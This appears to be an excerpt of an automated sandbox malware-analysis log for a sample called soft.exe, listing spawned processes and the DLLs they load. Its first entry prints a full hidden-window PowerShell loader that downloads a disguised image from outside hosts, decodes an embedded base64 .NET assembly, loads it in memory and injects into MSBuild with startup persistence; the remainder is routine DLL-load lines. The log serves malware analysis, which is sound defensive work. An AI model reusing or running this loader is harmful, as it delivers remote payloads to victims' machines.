                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/dgfgdfffffffffffg/gdfgdf/downloads/test2.jpg?137113', 'https://ofice365.github.io/1/test.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Lengthh = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Lengthh); $endIndex = $imageText.IndexOf($endFlag); $commandBytes = [System.Convert]::FromBase64String($base64Command); $endIndex = $imageText.IndexOf($endFlag); $endIndex = $imageText.IndexOf($endFlag); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $endIndex = $imageText.IndexOf($endFlag); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.gnrckkh/selif_cilbup/211.622.06.26//:', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -execJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"Jump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: moshost.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: mapsbtsvc.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: mosstorage.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: ztrace_maps.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: ztrace_maps.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: ztrace_maps.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: bcp47langs.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: mapconfiguration.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: aphostservice.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: networkhelper.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: userdataplatformhelperutil.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: mccspal.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: syncutil.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: syncutil.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: vaultcli.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: dmcfgutils.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: dmcmnutils.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: dmxmlhelputils.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: inproclogger.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: windows.networking.connectivity.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: synccontroller.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: pimstore.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: aphostclient.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: accountaccessor.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: dsclient.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: systemeventsbrokerclient.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: userdatalanguageutil.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: mccsengineshared.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: cemapi.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: userdatatypehelperutil.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: phoneutil.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: storsvc.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: devobj.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: fltlib.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: bcd.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: wer.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: cabinet.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: storageusage.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Users\user\Desktop\soft.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Users\user\Desktop\soft.exeSection loaded: winmm.dllJump to behavior
                            Source: C:\Users\user\Desktop\soft.exeSection loaded: powrprof.dllJump to behavior
                            Source: C:\Users\user\Desktop\soft.exeSection loaded: umpdc.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: w32time.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: logoncli.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: vmictimeprovider.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: mswsock.dllJump to behavior
                            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: winnsi.dllJump to behavior
                            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\LivKm\N7LnRW81Rfq.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\LivKm\N7LnRW81Rfq.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpSection loaded: mpr.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpSection loaded: version.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpSection loaded: msimg32.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpSection loaded: textinputframework.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpSection loaded: coreuicomponents.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpSection loaded: coremessaging.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpSection loaded: ntmarta.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpSection loaded: coremessaging.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpSection loaded: wintypes.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpSection loaded: wintypes.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpSection loaded: wintypes.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpSection loaded: shfolder.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpSection loaded: rstrtmgr.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpSection loaded: ncrypt.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpSection loaded: ntasn1.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpSection loaded: msacm32.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpSection loaded: winmmbase.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpSection loaded: winmmbase.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpSection loaded: textshaping.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpSection loaded: riched20.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpSection loaded: usp10.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpSection loaded: msls31.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpSection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpSection loaded: explorerframe.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpSection loaded: sfc.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpSection loaded: sfc_os.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeSection loaded: sqlite3.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeSection loaded: winmm.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeSection loaded: mpr.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeSection loaded: version.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeSection loaded: appxsip.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeSection loaded: opcservices.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeSection loaded: ntmarta.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeSection loaded: dhcpcsvc.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeSection loaded: mswsock.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeSection loaded: winnsi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeSection loaded: schannel.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeSection loaded: mskeyprotect.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeSection loaded: ntasn1.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeSection loaded: dpapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeSection loaded: gpapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeSection loaded: ncrypt.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeSection loaded: ncryptsslp.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\NP22AsNxTT\MnzBi21FK.exeSection loaded: cabinet.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\NP22AsNxTT\MnzBi21FK.exeSection loaded: version.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\NP22AsNxTT\MnzBi21FK.exeSection loaded: feclient.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\NP22AsNxTT\MnzBi21FK.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\NP22AsNxTT\MnzBi21FK.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\NP22AsNxTT\MnzBi21FK.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\NP22AsNxTT\MnzBi21FK.exeSection loaded: textinputframework.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\NP22AsNxTT\MnzBi21FK.exeSection loaded: coreuicomponents.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\NP22AsNxTT\MnzBi21FK.exeSection loaded: coremessaging.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\NP22AsNxTT\MnzBi21FK.exeSection loaded: ntmarta.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\NP22AsNxTT\MnzBi21FK.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\NP22AsNxTT\MnzBi21FK.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\NP22AsNxTT\MnzBi21FK.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\NP22AsNxTT\MnzBi21FK.exeSection loaded: textshaping.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\NP22AsNxTT\MnzBi21FK.exeSection loaded: advpack.dllJump to behavior
                            Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                            Source: C:\Windows\System32\cmd.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Windows\System32\cmd.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Windows\System32\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\cmd.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Windows\System32\cmd.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Windows\System32\cmd.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Windows\System32\cmd.exeSection loaded: edputil.dllJump to behavior
                            Source: C:\Windows\System32\cmd.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Windows\System32\cmd.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Windows\System32\cmd.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\System32\cmd.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Windows\System32\cmd.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                            Source: C:\Windows\System32\cmd.exeSection loaded: policymanager.dllJump to behavior
                            Source: C:\Windows\System32\cmd.exeSection loaded: msvcp110_win.dllJump to behavior
                            Source: C:\Windows\System32\cmd.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\System32\cmd.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Windows\System32\cmd.exeSection loaded: appresolver.dllJump to behavior
                            Source: C:\Windows\System32\cmd.exeSection loaded: bcp47langs.dllJump to behavior
                            Source: C:\Windows\System32\cmd.exeSection loaded: slc.dllJump to behavior
                            Source: C:\Windows\System32\cmd.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Windows\System32\cmd.exeSection loaded: sppc.dllJump to behavior
                            Source: C:\Windows\System32\cmd.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                            Source: C:\Windows\System32\cmd.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                            Source: C:\Windows\System32\cmd.exeSection loaded: pcacli.dllJump to behavior
                            Source: C:\Windows\System32\cmd.exeSection loaded: mpr.dllJump to behavior
                            Source: C:\Windows\System32\cmd.exeSection loaded: sfc_os.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
